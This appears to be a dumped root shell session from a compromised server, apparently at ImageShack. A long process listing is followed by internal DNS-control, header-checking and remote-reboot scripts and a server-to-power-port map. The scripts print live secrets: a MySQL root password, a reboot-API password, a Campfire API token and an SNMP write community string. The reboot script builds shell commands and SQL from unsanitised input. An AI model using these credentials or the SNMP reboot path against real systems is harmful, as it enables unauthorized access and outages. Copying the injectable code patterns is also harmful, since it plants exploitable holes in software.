apache 9298 0.0 0.0 40056 4988 ? S 07:36 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9299 0.0 0.0 40072 4988 ? S 07:36 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9368 0.0 0.0 40056 4988 ? S 07:37 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10924 0.0 0.0 40056 4992 ? S 07:41 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11049 0.0 0.0 40072 4992 ? S 07:42 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12098 0.0 0.0 40056 4988 ? S 07:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12116 0.0 0.0 40056 4988 ? S 07:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12178 0.0 0.0 40056 4992 ? S 07:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12204 0.0 0.0 40056 4988 ? S 07:48 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13696 0.0 0.0 40068 4984 ? S 07:51 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13707 0.0 0.0 40068 4988 ? S 07:51 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13726 0.0 0.0 40056 4992 ? S 07:52 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13771 0.0 0.0 40096 5384 ? S 07:52 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13781 0.0 0.0 40056 4992 ? S 07:53 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14464 0.0 0.0 40056 4988 ? S 07:55 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14853 0.0 0.0 40056 4988 ? S 07:57 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 15953 0.0 0.0 40056 4988 ? S 08:00 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 16293 0.0 0.0 40056 4988 ? S 08:00 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 16604 0.0 0.0 40056 4992 ? S 08:01 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17026 0.0 0.0 40072 4988 ? S 08:02 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17200 0.0 0.0 40072 4992 ? S 08:02 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17211 0.0 0.0 40056 5040 ? S 08:02 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17251 0.0 0.0 40068 4988 ? S 08:03 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17252 0.0 0.0 40056 4992 ? S 08:03 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17341 0.0 0.0 40068 4984 ? S 08:03 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 17381 0.0 0.0 40056 4988 ? S 08:03 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 18436 0.0 0.0 40380 5780 ? S 08:07 0:02 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 18459 0.0 0.0 40072 4992 ? S 08:07 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 21048 0.0 0.0 40056 4988 ? S 08:16 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 21075 0.0 0.0 40072 4996 ? S 08:16 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 21131 0.0 0.0 40072 4992 ? S 08:17 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 21155 0.0 0.0 40056 4988 ? S 08:17 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 22678 0.0 0.0 40068 4992 ? S 08:21 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 22818 0.0 0.0 40056 4988 ? S 08:22 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 22825 0.0 0.0 40068 4988 ? S 08:22 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 23883 0.0 0.0 40072 4988 ? S 08:27 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 23956 0.0 0.0 40056 4984 ? S 08:28 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 25296 0.0 0.0 40056 4988 ? S 08:30 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 25442 0.0 0.0 40056 5040 ? S 08:31 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 25452 0.0 0.0 40068 4984 ? S 08:31 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 25499 0.0 0.0 40056 4988 ? S 08:32 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 25517 0.0 0.0 40056 4988 ? S 08:32 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 25528 0.0 0.0 40056 5036 ? S 08:32 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 25535 0.0 0.0 40056 4992 ? S 08:32 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 26550 0.0 0.0 40068 4980 ? S 08:36 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 26580 0.0 0.0 40068 4980 ? S 08:37 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 26587 0.0 0.0 40056 4984 ? S 08:37 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 26591 0.0 0.0 40056 4988 ? S 08:37 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 27616 0.0 0.0 40072 4992 ? S 08:40 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 28157 0.0 0.0 40056 4976 ? S 08:41 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 28194 0.0 0.0 40068 4984 ? S 08:42 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 29382 0.0 0.0 40068 4988 ? S 08:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 29409 0.0 0.0 40072 4988 ? S 08:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 29460 0.0 0.0 40056 4992 ? S 08:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 29471 0.0 0.0 40056 4988 ? S 08:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 29478 0.0 0.0 40068 4984 ? S 08:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 29483 0.0 0.0 40068 4988 ? S 08:48 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 30988 0.0 0.0 40068 4984 ? S 08:51 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 31076 0.0 0.0 40056 4988 ? S 08:52 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 31105 0.0 0.0 40072 4992 ? S 08:53 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 31122 0.0 0.0 40056 4984 ? S 08:53 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 31755 0.0 0.0 40072 4988 ? S 08:55 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 32067 0.0 0.0 40056 4996 ? S 08:56 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 32090 0.0 0.0 40068 4984 ? S 08:56 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 32097 0.0 0.0 40068 4980 ? S 08:56 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 32133 0.0 0.0 40056 4988 ? S 08:57 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 32161 0.0 0.0 40056 4984 ? S 08:57 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 32169 0.0 0.0 40056 4988 ? S 08:57 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 32188 0.0 0.0 40056 4988 ? S 08:58 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 2050 0.0 0.0 40056 4988 ? S 09:02 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 2083 0.0 0.0 40072 4984 ? S 09:02 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 2150 0.0 0.0 40056 4984 ? S 09:03 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 2285 0.0 0.0 40056 4988 ? S 09:03 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 2959 0.0 0.0 40072 4988 ? S 09:06 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3020 0.0 0.0 40056 4984 ? S 09:06 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3263 0.0 0.0 40056 4992 ? S 09:06 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3281 0.0 0.0 40056 4988 ? S 09:06 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3318 0.0 0.0 40056 4980 ? S 09:07 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3330 0.0 0.0 40056 4980 ? S 09:07 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 3383 0.0 0.0 40072 4984 ? S 09:08 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 4923 0.0 0.0 40056 4988 ? S 09:12 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 4928 0.0 0.0 40056 4988 ? S 09:12 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 4942 0.0 0.0 40068 4976 ? S 09:12 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 4946 0.0 0.0 40068 4984 ? S 09:12 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 4973 0.0 0.0 40056 4980 ? S 09:13 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 5048 0.0 0.0 40056 4984 ? S 09:14 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 5955 0.0 0.0 40056 4984 ? S 09:16 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 5963 0.0 0.0 40056 4988 ? S 09:16 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 5974 0.0 0.0 40056 4980 ? S 09:16 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 5975 0.0 0.0 40068 4980 ? S 09:16 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 5976 0.0 0.0 40068 4984 ? S 09:16 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 5983 0.0 0.0 40056 4980 ? S 09:16 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6021 0.0 0.0 40056 4980 ? S 09:17 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6032 0.0 0.0 40056 4984 ? S 09:17 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6067 0.0 0.0 40068 4984 ? S 09:18 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6085 0.0 0.0 40056 4988 ? S 09:18 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 6093 0.0 0.0 40056 4980 ? S 09:18 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7358 0.0 0.0 40068 4976 ? S 09:21 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7440 0.0 0.0 40056 4980 ? S 09:21 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7575 0.0 0.0 40072 4992 ? S 09:21 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7580 0.0 0.0 40056 4980 ? S 09:21 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7587 0.0 0.0 40056 4988 ? S 09:21 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7614 0.0 0.0 40068 4984 ? S 09:21 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7708 0.0 0.0 40068 4980 ? S 09:22 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7751 0.0 0.0 40056 4976 ? S 09:23 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 7762 0.0 0.0 40056 4988 ? S 09:23 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8812 0.0 0.0 40072 4988 ? S 09:27 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8850 0.0 0.0 40068 4976 ? S 09:28 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 8864 0.0 0.0 40056 4984 ? S 09:28 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9869 0.0 0.0 40056 4972 ? S 09:30 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9919 0.0 0.0 40056 4988 ? S 09:30 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 9931 0.0 0.0 40072 4976 ? S 09:30 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10360 0.0 0.0 40068 4980 ? S 09:31 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10361 0.0 0.0 40056 4984 ? S 09:31 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10416 0.0 0.0 40072 4980 ? S 09:32 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10417 0.0 0.0 40056 4976 ? S 09:32 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10443 0.0 0.0 40056 4976 ? S 09:32 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10467 0.0 0.0 40056 4972 ? S 09:33 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 10933 0.0 0.0 40068 4976 ? S 09:35 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11452 0.0 0.0 40056 4984 ? S 09:36 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11471 0.0 0.0 40068 4976 ? S 09:36 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11525 0.0 0.0 40056 4984 ? S 09:37 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11540 0.0 0.0 40068 4976 ? S 09:37 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11541 0.0 0.0 40056 4984 ? S 09:37 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11551 0.0 0.0 40056 4988 ? S 09:38 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 11552 0.0 0.0 40056 4972 ? S 09:38 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 12624 0.0 0.0 40072 4980 ? S 09:40 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13061 0.0 0.0 40056 4972 ? S 09:41 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13097 0.0 0.0 40068 4976 ? S 09:41 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13098 0.0 0.0 40056 4984 ? S 09:41 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13192 0.0 0.0 40056 4976 ? S 09:42 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13257 0.0 0.0 40056 4972 ? S 09:43 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13943 0.0 0.0 40056 4972 ? S 09:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 13996 0.0 0.0 40056 4972 ? S 09:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14252 0.0 0.0 40056 4972 ? S 09:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14285 0.0 0.0 40056 4972 ? S 09:46 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14311 0.0 0.0 40072 4984 ? S 09:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14329 0.0 0.0 40056 4968 ? S 09:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14330 0.0 0.0 40068 4976 ? S 09:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14340 0.0 0.0 40056 4968 ? S 09:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 14341 0.0 0.0 40072 4964 ? S 09:47 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 15859 0.0 0.0 40072 4964 ? S 09:51 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 15877 0.0 0.0 40056 4968 ? S 09:51 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 15888 0.0 0.0 40072 4964 ? S 09:51 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 15897 0.0 0.0 39924 2976 ? S 09:52 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
apache 15931 0.0 0.0 39924 2976 ? S 09:52 0:00 \_ /usr/lo
cal/bin/php-cgi -d upload_tmp_dir=/tmp
root 19008 0.0 0.0 2712 184 ? S Aug29 0:00 -sh
root 19009 0.0 0.0 2712 304 ? S Aug29 0:00 \_ -sh
root 16024 0.0 0.0 2716 244 ? S 09:54 0:00 \_ -sh
root 16025 0.0 0.0 5784 1088 ? R 09:54 0:00 \_
ps auxwwf
# ls -alt /home/image/control_dns.sh
-rwxr-xr-x 1 root root 6060 Jan 1 2012 /home/image/control_dns.sh
# head -n 30 /home/image/control_dns.sh
#!/bin/sh
mysql () {
command mysql -h 127.0.0.1 "$@"
}
echo "setting reboots per month..."
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set reboots_month =
0'
mysql -u root -pmutaborius snmp -e 'drop table temp_table'
mysql -u root -pmutaborius snmp -e 'create table temp_table select server_id
,MAX(entry_time) entry_time,count(server_id) tcount,actor from auto_reboot_l
og where FROM_UNIXTIME(entry_time) > NOW()-60*60*24*30 group by server_id'
mysql -u root -pmutaborius snmp -e 'update snmp_traffic,temp_table set reboo
t_timestamp = temp_table.entry_time, snmp_traffic.reboots_month = temp_table
.tcount, snmp_traffic.actor = temp_table.actor where name = temp_table.serve
r_id'
echo "updating mysql..."
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set saturate = speed
/gig'
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set speed = 0 where
UNIX_TIMESTAMP(NOW()) - date > 60*10';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 0';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set reasons = ""';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 1 where t
otal_disks = 1 and type = "is"';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 2 where t
otal_disks = 2 and shortcpu != "D" and type = "is"';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 3 where t
otal_disks = 3 and type = "is" and mobo != "X7SBL"';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 4 where t
otal_disks > mounted_disks';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 11 where
d1_name != "" and d1_map = "" and d1_serial != ""';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 12 where
d2_name != "" and d2_map = "" and d2_serial != ""';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 13 where
d3_name != "" and d3_map = "" and d3_serial != ""';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 14 where
d4_name != "" and d4_map = "" and d4_serial != ""';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 15 where
d5_name != "" and d5_map = "" and d5_serial != ""';
mysql -u root -pmutaborius snmp -e 'update snmp_traffic set miss = 16 where
d6_name != "" and d6_map = "" and d6_serial != ""';
echo "writing info files..."
mysql -u root -pmutaborius snmp -e 'select id from snmp_traffic where indnsb
ool = 1' | grep -v count | grep -v id > /home/image/www/indns.txt
# /home/image/control_dns.sh|grep -v mutaborius
#!/bin/sh
mysql () {
command mysql -h 127.0.0.1 "$@"
}
echo "setting reboots per month..."
echo "updating mysql..."
echo "writing info files..."
echo "counting favorite matches..."
echo "checking response headers..."
/root/php -q /home/image/curlchecker.php >> /tmp/dns.write.log
echo "inserting data..."
/bin/sh /home/image/insert_counts.sh >> /tmp/dns.write.log
echo "making DNS..."
/root/php -q /home/image/dnsmaker.php >> /tmp/dns.write.log
echo "restarting named..."
killall -HUP named
echo "rebooting down servers...";
for i in `tail -10 /home/image/www/auto.reboots`; do /root/php -q /home/imag
e/www/dev/rebootapi.php holyshityoucanreboot $i automated >> /tmp/dns.write.
log; done
echo "scheduling oncall..."
for i in `seq 0 10`; do date +'%m %d %y' -d $i' days ago' | grep "`xargs`" /
home/image/www/oncall.schedule; done | head -1 | awk '{print $NF}' > /home/i
mage/www/oncall.person
echo "caching dns table..."
/root/php -q /home/image/www/health/index.php crontab > /tmp/dns_table.htm &
& cp /tmp/dns_table.htm /home/image/www/health/cache.htm
echo "complete."
# cat /home/image/curlchecker.php
#!/root/php
<?php
$array = array();
include('/home/image/www/dev/dnsConnect.php');
function get_header($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
$curl_response_info = curl_getinfo($ch);
return $curl_response_info[http_code];
}
$hostnames = file("/home/image/www/hostnames.txt");
$hostnames_ds = file("/home/image/www/hostnames.desmond.txt");
foreach($hostnames as $hostname){
$hostname = trim($hostname);
list($name) = explode(".",$hostname);
$header = get_header("http://$name/");
if($header != 200){
$array[$name] = $header;
}
}
foreach($hostnames_ds as $hostname){
$hostname = trim($hostname);
list($name) = explode(".",$hostname);
$header = get_header("http://$name:17000/");
if($header != 204){
$array[$name] = $header;
}
}
$old_array = unserialize(file_get_contents("/tmp/r.codes"));
$prev_array = unserialize(file_get_contents("/tmp/r.codes.prev"));
echo "current array:\n";
print_r($array);
echo "last check array:\n";
print_r($old_array);
echo "before last check array:\n";
print_r($prev_array);
exec("mv /tmp/r.codes /tmp/r.codes.prev");
$serial = serialize($array);
file_put_contents("/tmp/r.codes",$serial);
mysql_query("update snmp_traffic set rcode = 200", $bd);
foreach($array as $name => $header){
if(array_key_exists($name,$old_array) && array_key_exists($name,$prev_array
)){
$query = "update snmp_traffic set rcode = $header where name = '$name'";
echo $query."\n";
mysql_query("$query", $bd);
$final[$name] = $header;
}
}
echo "only the servers in all three arrays:\n";
print_r($final);
mysql_close($bd);
?>
# /home/image/www/dev/rebootapi.php
<?php
// example: http://gslb.imageshack.us/dev/rebootapi.php?server=$sname&redire
ct=yes&pass=holyshityoucanreboot&user=$user
include("/home/image/www/auths.php");
echo "proceeding to reboot.. \n";
$users = user_array();
$user_id = $users[$user][id];
function campfire($line) {
$request = '{"message":{"body":"' . addslashes($line) . '"}}';
$ch = curl_init('https://imageshack.campfirenow.com/room/279733/spea
k.json');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERPWD, 'be651a30591d2cf1428683182136173ad
1ffcd23');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: applicatio
n/json'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
}
if(eregi("rebootapi.php",$argv[0])){
$pass = $argv[1];
$server = $argv[2];
$act = "automated";
$user_id = 0;
$hour = date("G");
// edwin hack 2011-10-01
if($hour >= 0 && $hour <= 24){ //disable automated reboots between 9 am
and 8:59 pm (business hours)
// if($hour >= 9 && $hour <= 20){ //disable automated reboots between
9 am and 8:59 pm (business hours)
exit;
}
}
if($pass != "holyshityoucanreboot"){ exit; }
if(!$act) { $act = "human"; }
$actors['automated'] = 1;
$actors['human'] = 2;
$actors['netboot'] = 4;
list($name,$ip,$port) = explode(" ",trim(`cat /tmp/apc.walked | grep '$serve
r ' | head -1`));
`snmpset -c shackster85 -r 3 -t 3 -v 1 $ip .1.3.6.1.4.1.318.1.1.12.3.3.1.1.4
.$port i 3`;
$message = $user." ".$act." ".$server." ".$ip." ".$port;
campfire("reboot issued: ".$message);
if($name == "mtag6"){
list($name2,$ip2,$port2) = explode(" ",trim(`cat /tmp/apc.walked | g
rep '$server ' | tail -1`));
`snmpset -c shackster85 -r 3 -t 3 -v 1 $ip2 .1.3.6.1.4.1.318.1.1.12.
3.3.1.1.4.$port2 i 3`;
$message = $user." ".$act." ".$server." ".$ip2." ".$port2;
campfire("reboot issued: ".$message);
}
$time = time();
$query = "INSERT into auto_reboot_log (entry_time,server_id,actor,user) VALU
ES ($time, \47$server\47, $actors[$act], $user_id)";
trim(`mysql -u root -pmutaborius snmp -e "$query"`);
if ($_REQUEST['redirect'] == 'yes') {
header("Location: http://gslb.imageshack.us/dev/reboot_log.php");
exit();
}
?>
# cat /tmp/apc.walked
img728 10.102.1.240 1
gsaa1 10.102.1.240 9
img977 10.102.1.240 15
img978 10.102.1.240 16
gsju1 10.102.1.240 17
gsju2 10.102.1.240 18
gsju3 10.102.1.240 19
gsaa2 10.102.1.240 20
gsaa3 10.102.1.240 21
gsaa4 10.102.1.240 22
img23 10.102.1.241 7
img21 10.102.1.241 8
img18 10.102.1.241 9
img16 10.102.1.241 10
img14 10.102.1.241 11
img12 10.102.1.241 12
img25 10.102.1.241 22
img27 10.102.1.241 23
img26 10.102.1.241 24
img20 10.102.1.242 3
img132 10.102.1.242 4
img679 10.102.1.242 10
img7 10.102.1.242 13
img5 10.102.1.242 14
img623 10.102.1.242 15
img625 10.102.1.242 16
img627 10.102.1.242 17
img629 10.102.1.242 18
img631 10.102.1.242 19
img634 10.102.1.242 20
img3 10.102.1.242 21
img676 10.102.1.242 22
img727 10.102.1.244 9
img597 10.102.1.244 10
img730 10.102.1.244 17
img760 10.102.1.244 18
img758 10.102.1.244 19
img15 10.102.4.240 5
img13 10.102.4.240 6
img19 10.102.4.240 7
img24 10.102.4.240 8
img22 10.102.4.240 9
img17 10.102.4.240 10
img11 10.102.4.240 11
img9 10.102.4.240 13
img679 10.102.4.240 20
img676 10.102.4.240 23
img677 10.102.4.240 24
img29 10.102.4.241 7
img30 10.102.4.241 8
img31 10.102.4.241 9
img32 10.102.4.241 10
img33 10.102.4.241 11
img34 10.102.4.241 12
img35 10.102.4.241 13
img36 10.102.4.241 14
img37 10.102.4.241 15
